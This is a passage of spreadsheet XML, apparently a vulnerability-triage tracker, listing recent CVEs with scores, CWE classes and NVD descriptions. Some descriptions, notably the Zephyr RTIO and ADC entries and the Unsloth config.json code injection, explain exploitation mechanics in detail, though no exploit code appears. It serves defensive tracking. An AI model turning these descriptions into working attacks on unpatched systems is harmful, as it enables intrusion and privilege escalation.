          <t>Network UPS Tools is a collection of programs which provide a common interface for monitoring and administering UPS, PDU and SCD hardware. Prior to commits 658b24e and 1aa31d1, the GitHub Actions script used to prepare NUT tarballs and update GitHub Checks statuses and PR comments about it was mis-structured in terms of mixing code running with higher privileges (single-use token generated with write permissions) and untrusted inputs (PR source branch). A malicious PR run from a fork could extract the GITHUB_TOKEN value. It could potentially be abused while it was valid (while the GHA job ran) to manipulate Git repository contents, commit checks/statuses, or issue/PR comments, according to permissions it was issued with. This issue has been patched via commits 658b24e and 1aa31d1.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54160</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82383</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>Missing Authentication for Critical Function in Apache Roller 6.1.5 allows an unauthenticated remote attacker to persistently change a site-global configuration value (the frontpage weblog selection) on any installed instance, because the setup action remains anonymously reachable after installation and persists configuration without an authorization check. No optional feature or non-default configuration is required; the result can redirect or break the site's public frontpage, with administrative recovery available. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which restricts the write to global administrators.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82383</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91043</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>hp</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling vulnerability in elixir-mint mint allows a malicious HTTP/2 server to exhaust memory on the client host and cause a denial of service.
Mint.HTTP2 enforces the client's max_header_list_size setting only on the compressed size of an inbound header block, while RFC 9113 section 6.5.2 defines the limit on the decoded header list. An HPACK indexed field costs one byte on the wire and decodes to a dynamic table entry of up to 4 KB, and join_cookie_headers/1 in lib/mint/http2.ex copies every cookie value of a response into one new binary. A header block under the default 256 KB wire limit therefore makes the client allocate about 1 GB for a single response, and several such responses in one delivery exhaust the memory of the process that owns the connection or of the whole VM.
This issue affects mint: from 1.1.0 before 1.11.0.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91043</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82323</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through User-Controlled key vulnerability in Enocta Educational Technologies Inc. Enocta Platform allows Exploitation of Trusted Identifiers.
This issue affects Enocta Platform: through 2026-09-28.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82323</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82380</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Request Forgery (CSRF) in Apache Roller 6.1.5 allows a remote attacker to cause a logged-in user to perform state-changing actions under the victim's authority, because the CSRF validation filters accept a request that does not submit the required salt token, validating instead against a value the server itself generated for the request. No optional feature or non-default configuration is required; any logged-in author or administrator is affected when induced to visit a crafted page. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which validates only the submitted salt and applies the same check to multipart forms.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82380</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88805</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>go, suse</t>
        </is>
      </c>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>Incorrect credential cleaning on logout could be used by remote attackers to keep access credentials even after the account was logged out. Affected is SUSE Rancher 2.15 before 2.15.2.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88805</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93348</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>Unsloth Zoo versions 2025.9.9 before 2026.8.14, as implemented in Unsloth 2025.9.9 through 2026.8.19, contains a code injection vulnerability in the model-loading compile path where the get_transformers_model_type() function in hf_utils.py collects model_type values from nested model configurations without enforcing a character allowlist, allowing newlines and arbitrary Python source to survive normalization. Attackers can embed a newline in a nested model_type value within a malicious model's config.json to terminate the generated import statement and execute arbitrary Python code via exec() in unsloth_compile_transformers(), achieving remote code execution as the loading user when the model is loaded for training or inference.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93348</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93355</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>LiteLLM contains a weak authentication vulnerability that allows an attacker holding a valid JWT from the configured identity provider to authenticate as any existing user by exploiting an email-based fallback lookup in the JWT authentication flow without verifying the email_verified claim. Attackers can present a token with an unverified email address matching a victim's account to inherit the victim's role, including proxy_admin privileges, and permanently overwrite the victim's stored identity binding to retain persistent unauthorized access to administrative endpoints exposing API keys and user management.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93355</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102004</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>0bf9931a-6ebf-4f48-bd14-39ee5e1d61f8</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>Wind River VxWorks 7 prior to 26.09, specific system call arguments can result in memory corruption within the memory management subsystem. Fixed in Version 26.09</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102004</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16513</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>The userspace verifier z_vrfy_rtio_sqe_copy_in_get_handles() in subsys/rtio/rtio_syscalls.c (subsys/rtio/rtio_handlers.c before v4.3.0) validated the RTIO object handle and the sqes input array, but not the handle out-parameter. On the first loop iteration it executed *handle = sqe, storing the kernel address of the newly acquired submission-queue entry through a pointer taken verbatim from user mode, with no K_SYSCALL_MEMORY_WRITE check in front of it.
Any user-mode thread that has been granted a struct rtio kernel object can invoke the syscall with an arbitrary address in handle. That is the ordinary way an unprivileged thread uses the RTIO API, for example via sensor_read_async_mempool() or the async ADC helpers, which call rtio_sqe_copy_in_get_handles() internally. The store happens in supervisor mode before any submission-entry validation, so it fires regardless of whether the SQE contents are subsequently rejected. Only builds with CONFIG_USERSPACE and CONFIG_RTIO are affected; without CONFIG_USERSPACE the verifier is not compiled and the caller is already privileged.
The write address is fully attacker-chosen and the written value is a pointer into the caller's own RTIO ring, whose contents the caller controls (the following *sqe = sqes[i] copies an attacker-supplied struct rtio_sqe into that slot). This yields a write-what-where primitive placing a pointer to attacker-controlled data at any kernel address, sufficient to corrupt kernel function pointers, thread structures, or memory-domain partition tables, and thus to escalate from user mode to kernel mode, defeating the isolation boundary CONFIG_USERSPACE is meant to enforce. At minimum it is a reliable kernel memory-corruption and crash primitive. The reporter reproduced the write on qemu_x86: a K_USER thread changed a supervisor global from NULL to a live kernel SQE pointer.
The fix adds K_SYSCALL_MEMORY_WRITE(handle, sizeof(*handle)) (guarded by the existing optional-NULL semantics) before the loop, so the destination must lie in the calling thread's writable memory domain or the thread is terminated by K_OOPS. The neighbouring verifier z_vrfy_rtio_cqe_get_mempool_buffer(), which checked its buff/buff_len out-parameters only for read although the implementation writes through them, was hardened separately by bea93400138 ("rtio: syscalls: validate output params as writable"); that residual was materially weaker, since a read check still confines the target to the caller's own memory domain.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16513</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18413</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>The ADC API requires each driver to reject a sampling sequence whose destination buffer is too small: the buffer_size field of struct adc_sequence in include/zephyr/drivers/adc.h documents that "the driver must ensure that samples are not written beyond the limit and it must return an error if the buffer turns out to be not large enough". The NXP MCUX LPADC driver did not honour that contract. mcux_lpadc_start_read() in drivers/adc/adc_mcux_lpadc.c performed no buffer-size check at all before assigning data-&gt;buffer = sequence-&gt;buffer. Each completed conversion then stores one 16-bit sample per enabled channel per sampling round through an unbounded *data-&gt;buffer++: in mcux_lpadc_isr() for interrupt-driven builds, and in mcux_lpadc_dma_callback() for DMA-driven builds on releases that have the DMA path. A sequence selecting two channels with a two-byte buffer, for example, has its second sample written past the end of the buffer.
On a build with CONFIG_USERSPACE, adc_read() and adc_read_async() are system calls. The handler in drivers/adc/adc_handlers.c copies the sequence in from user memory, verifies only that [buffer, buffer + buffer_size) is writable by the calling thread, and rejects a user-supplied options-&gt;callback; it deliberately leaves the size arithmetic to the driver. A user-mode thread that has been granted access to an LPADC device object therefore fully controls channels, buffer, buffer_size and options-&gt;extra_samplings, and can request far more samples than its buffer can hold: up to channels * 65536 samples into a two-byte buffer, since the sample pointer is only rewound on a repeat sampling, never on the extra samplings of a sequence.
The resulting stores are performed by the driver in kernel mode (in the ADC interrupt handler or the DMA completion callback), where the MPU does not restrict the thread's memory domain, so the write walks linearly out of the user partition and into adjacent memory such as other partitions, kernel data or thread stacks. The impact is kernel-memory corruption of attacker-chosen length at an attacker-chosen offset, a plausible privilege-escalation and denial-of-service primitive from an unprivileged user-mode thread. Builds without CONFIG_USERSPACE are affected only as a caller-side robustness defect, since the application itself supplies the buffer.
The fix calls the new shared helper adc_sequence_validate_buffer() in drivers/adc/adc_common.c from mcux_lpadc_start_read(). The helper computes active_channels  sizeof(uint16_t)  (1 + extra_samplings) and returns -ENOMEM before any sampling is started.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18413</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18414</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>The ADC API requires each driver to reject a sampling sequence whose destination buffer is too small: the buffer_size field of struct adc_sequence in include/zephyr/drivers/adc.h documents that "the driver must ensure that samples are not written beyond the limit and it must return an error if the buffer turns out to be not large enough". The ADI MAX32 driver did not honour that contract. start_read() in drivers/adc/adc_max32.c compared buffer_size, a byte count, against a sample count ((1 + extra_samplings)  channels), ignoring sizeof(uint16_t), so it accepted a buffer half the required size. The samples are then stored through the uint16_t  data-&gt;buffer by Wrap_MXC_ADC_GetData(), which writes two bytes per sample and advances the pointer by one uint16_t: in adc_max32_start_channel() for synchronous reads, and in adc_max32_isr() for asynchronous ones. A sequence selecting two channels with a two-byte buffer, for example, passes the check and has its second sample written past the end of the buffer.
On a build with CONFIG_USERSPACE, adc_read() and adc_read_async() are system calls. The handler in drivers/adc/adc_handlers.c copies the sequence in from user memory, verifies only that [buffer, buffer + buffer_size) is writable by the calling thread, and rejects a user-supplied options-&gt;callback; it deliberately leaves the size arithmetic to the driver. A user-mode thread that has been granted access to a MAX32 ADC device object therefore fully controls channels, buffer, buffer_size and options-&gt;extra_samplings, and can make the driver write twice as many bytes as its buffer holds. Because the check scales with extra_samplings, the overrun equals the length of the buffer itself, up to channels * 65536 bytes past its end, since the sample pointer is only rewound on a repeat sampling, never on the extra samplings of a sequence.
The resulting stores are performed by the driver in kernel mode (in the system call itself, the ADC context timer, or the ADC interrupt handler for asynchronous reads), where the MPU does not restrict the thread's memory domain, so the write walks linearly out of the user partition and into adjacent memory such as other partitions, kernel data or thread stacks. The impact is kernel-memory corruption of attacker-chosen length at an attacker-chosen offset, a plausible privilege-escalation and denial-of-service primitive from an unprivileged user-mode thread. Builds without CONFIG_USERSPACE are affected only as a caller-side robustness defect, since the application itself supplies the buffer.
The fix replaces that check in start_read() with a call to the new shared helper adc_sequence_validate_buffer() in drivers/adc/adc_common.c, passing sizeof(uint16_t) as the sample size. The helper computes active_channels  sizeof(uint16_t)  (1 + extra_samplings) and returns -ENOMEM before any sampling is started.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18414</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4556</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>41c37e40-543d-43a2-b660-2fee83ea851a</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>Exam4 is affected by a local privilege escalation vulnerability in the com.extegrity.LogTool privileged helper, which communicates with the application via XPC. The [ConsoleLogHelper copyConsoleIntoFileFromStartDate:] method executes a syslog command using attacker-controlled parameters without proper sanitization, enabling command injection. Successful exploitation allows a local attacker to execute arbitrary commands with root privileges through LaunchSynchronous.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4556</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45562</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
